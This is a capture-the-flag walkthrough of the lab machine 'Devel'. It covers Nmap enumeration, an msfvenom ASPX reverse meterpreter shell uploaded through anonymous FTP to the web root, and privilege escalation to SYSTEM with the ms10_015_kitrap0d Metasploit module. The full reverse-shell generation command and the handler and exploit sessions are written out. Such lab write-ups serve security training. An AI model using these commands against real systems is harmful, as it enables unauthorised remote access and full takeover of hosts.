Devel
OS: Windows, Difficulty: Easy, IP: 10.10.10.5
Initial Enumeration
# Nmap 7.70 scan initiated Sat Jul 6 15:29:35 2019 as: nmap -p 21,80 -sV -sC -O -A -oN O-Detailed 10.10.10.5
Nmap scan report for 10.10.10.5
Host is up (0.24s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 02:06AM <DIR> aspnet_client
| 03-17-17 05:37PM 689 iisstart.htm
|_03-17-17 05:37PM 184946 welcome.png
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012:r2
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using port 21/tcp)
HOP RTT ADDRESS
1 237.33 ms 10.10.14.1
2 237.55 ms 10.10.10.5
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jul 6 15:29:54 2019 -- 1 IP address (1 host up) scanned in 19.17 seconds
We have anonymous FTP and a web-server. It turns out the FTP access is the root directory of the Web-Server hence we can upload our reverse ASPX shell directly via FTP and get a shell.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.7 LPORT=9999 -f aspx > shell.aspx
msf5> use exploit/multi/handler
msf5 exploit(multi/handler) > set LHOST 10.10.14.7
msf5 exploit(multi/handler) > set LPORT 9999
msf5 exploit(multi/handler) > exploit -j -z
[*] Started reverse TCP handler on 10.10.14.7:9999
[*] Sending stage (179779 bytes) to 10.10.10.5
[*] Meterpreter session 1 opened (10.10.14.7:9999 -> 10.10.10.5:49157) at 2019-07-06 16:10:19 +0530
Now we will use the local exploit suggester and use the XYZ exploit
meterpreter > run post/multi/recon/local_exploit_suggester SHOWDESCRIPTION=true
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated
msf5 exploit(multi/handler) > use exploit/windows/local/ms10_015_kitrap0d
msf5 exploit(windows/local/ms10_015_kitrap0d) > show options
Module options (exploit/windows/local/ms10_015_kitrap0d):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.14.7 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
PLEASE NOTE
Please make sure while running the exploit/windows/local/ms10_015_kitrap0d
exploit the LHOST and LPORT options are correctly configured as by default the settings are not correct.
msf5 exploit(windows/local/ms10_015_kitrap0d) > exploit
[*] Started reverse TCP handler on 10.10.14.7:4444
[*] Launching notepad to host the exploit...
[+] Process 2548 launched.
[*] Reflectively injecting the exploit DLL into 2548...
[*] Injecting exploit into 2548 ...
[*] Exploit injected. Injecting payload into 2548...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (179779 bytes) to 10.10.10.5
[*] Meterpreter session 6 opened (10.10.14.7:4444 -> 10.10.10.5:49158) at 2019-07-06 16:10:54 +0530
meterpreter > shell
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>whoami
whoami
nt authority\system
User Own
C:\Users\babis\Desktop>type user.txt.txt
type user.txt.txt
9ecdd***
Root Own
C:\Users\Administrator\Desktop>type root.txt.txt
type root.txt.txt
e621a***
Learning Outcome
I was not aware of how to use metasploit sessions and that we can even use local exploit suggester, if we do not find any vulnerable information and the box is a little old. Additionally, sometimes exploit may be running fine but the LHOST and LPORT settings may be the problem. These were some key lessons while solving this box.
Last updated
Was this helpful?